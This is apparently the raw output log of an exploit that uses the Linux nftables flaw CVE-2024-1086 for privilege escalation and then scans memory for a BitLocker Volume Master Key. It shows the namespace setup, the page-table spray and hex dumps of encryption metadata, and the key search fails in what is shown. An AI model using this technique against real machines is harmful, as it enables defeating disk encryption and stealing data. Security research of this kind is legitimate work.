[+] Info: Exploiting CVE-2024-1086 and obtaining VMK...
[*] creating user namespace (CLONE_NEWUSER)...
[*] creating network namespace (CLONE_NEWNET)...
[*] setting up UID namespace...
[*] configuring localhost in namespace...
[*] setting up nftables...
[+] running normal privesc
[*] waiting for the calm before the storm...
[*] sending double free buffer packet...
[*] spraying 16000 pte's...
[*] checking 16000 sprayed pte's for overlap...
[+] confirmed double alloc PMD/PTE
[+] found possible VMK base: 0x804033e640 -> 000000000033e640
2D 46 56 45 2D 46 53 2D 78 00 02 00 04 00 04 00 | -FVE-FS-x.......
00 1E 05 8B 6A 00 00 00 00 00 00 00 10 00 00 00 | ....j...........
00 00 40 09 00 00 00 00 00 00 40 49 00 00 00 00 | ..@.......@I....
00 00 70 C9 00 00 00 00 00 00 41 09 00 00 00 00 | ..p.......A.....
3A 07 00 00 01 00 00 00 30 00 00 00 3A 07 00 00 | :.......0...:...
70 F9 EC 9E E6 1B 05 45 B9 12 FF 0B E9 0B 2B 4F | p......E......+O
60 00 00 00 04 80 00 00 78 14 FC D4 8B BC DA 01 | `.......x.......
42 00 07 00 02 00 01 00 4C 00 41 00 50 00 54 00 | B.......L.A.P.T.
4F 00 50 00 2D 00 4D 00 46 00 41 00 34 00 44 00 | O.P.-.M.F.A.4.D.
49 00 4C 00 4E 00 20 00 4F 00 53 00 20 00 32 00 | I.L.N. .O.S. .2.
30 00 32 00 34 00 2F 00 36 00 2F 00 31 00 32 00 | 0.2.4./.6./.1.2.
00 00 50 00 03 00 05 00 01 00 30 9B B7 52 EA 21 | ..P.......0..R.!
DB 01 17 00 00 00 A4 D1 45 40 5F 84 88 16 14 25 | ........E@_....%
BA F5 85 52 15 44 4E D8 A5 9D 10 35 C3 E3 9A 0D | ...R.DN....5....
DF DA FE 6B E8 94 7E 07 E6 D4 2E 99 A2 D4 26 F8 | ...k..~.......&.
EE 01 EF 72 F9 82 83 77 91 6A 28 E3 59 1D 93 80 | ...r...w.j(.Y...
[+] VERSION MISMATCH! 262148
[+] found possible VMK base: 0x8040203000 -> 0000000000203000
2D 46 56 45 2D 46 53 2D 00 40 00 00 01 00 00 00 | -FVE-FS-.@......
20 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 | ...P...........
30 01 00 00 01 00 00 00 30 00 00 00 00 01 00 00 | 0.......0.......
4D 94 0D 1B 28 6E 9F 4A BD 50 F6 44 20 60 FB 02 | M...(n.J.P.D `..
01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
34 00 0A 00 0B 00 01 00 18 00 00 00 18 00 28 80 | 4.............(.
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
00 03 10 00 34 00 0A 00 0B 00 01 00 15 00 00 00 | ....4...........
3A 00 21 C0 70 F9 EC 9E E6 1B 05 45 B9 12 FF 0B | :.!.p......E....
E9 0B 2B 4F 00 00 00 00 00 00 00 00 00 00 00 00 | ..+O............
00 00 00 00 00 00 00 00 34 00 0A 00 0B 00 01 00 | ........4.......
09 00 00 00 3A 00 21 C0 70 F9 EC 9E E6 1B 05 45 | ....:.!.p......E
B9 12 FF 0B E9 0B 2B 4F 00 00 00 00 00 00 00 00 | ......+O........
00 00 00 00 00 00 00 00 00 03 50 00 34 00 0A 00 | ..........P.4...
0B 00 01 00 0B 00 00 00 00 00 21 C0 70 F9 EC 9E | ..........!.p...
[+] VMK-needle not found!
[-] failed to find correct VMK addr: trying to find new base...
[+] found possible VMK base: 0x8040203000 -> 0000000000403000
2D 46 56 45 2D 46 53 2D 00 40 00 00 01 00 00 00 | -FVE-FS-.@......
20 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 | ...P...........
30 01 00 00 01 00 00 00 30 00 00 00 00 01 00 00 | 0.......0.......
4D 94 0D 1B 28 6E 9F 4A BD 50 F6 44 20 60 FB 02 | M...(n.J.P.D `..
01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
34 00 0A 00 0B 00 01 00 18 00 00 00 18 00 28 80 | 4.............(.
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
00 03 10 00 34 00 0A 00 0B 00 01 00 15 00 00 00 | ....4...........
3A 00 21 C0 70 F9 EC 9E E6 1B 05 45 B9 12 FF 0B | :.!.p......E....
E9 0B 2B 4F 00 00 00 00 00 00 00 00 00 00 00 00 | ..+O............
00 00 00 00 00 00 00 00 34 00 0A 00 0B 00 01 00 | ........4.......
09 00 00 00 3A 00 21 C0 70 F9 EC 9E E6 1B 05 45 | ....:.!.p......E
B9 12 FF 0B E9 0B 2B 4F 00 00 00 00 00 00 00 00 | ......+O........
00 00 00 00 00 00 00 00 00 03 50 00 34 00 0A 00 | ..........P.4...
0B 00 01 00 0B 00 00 00 00 00 21 C0 70 F9 EC 9E | ..........!.p...
[+] VMK-needle not found!
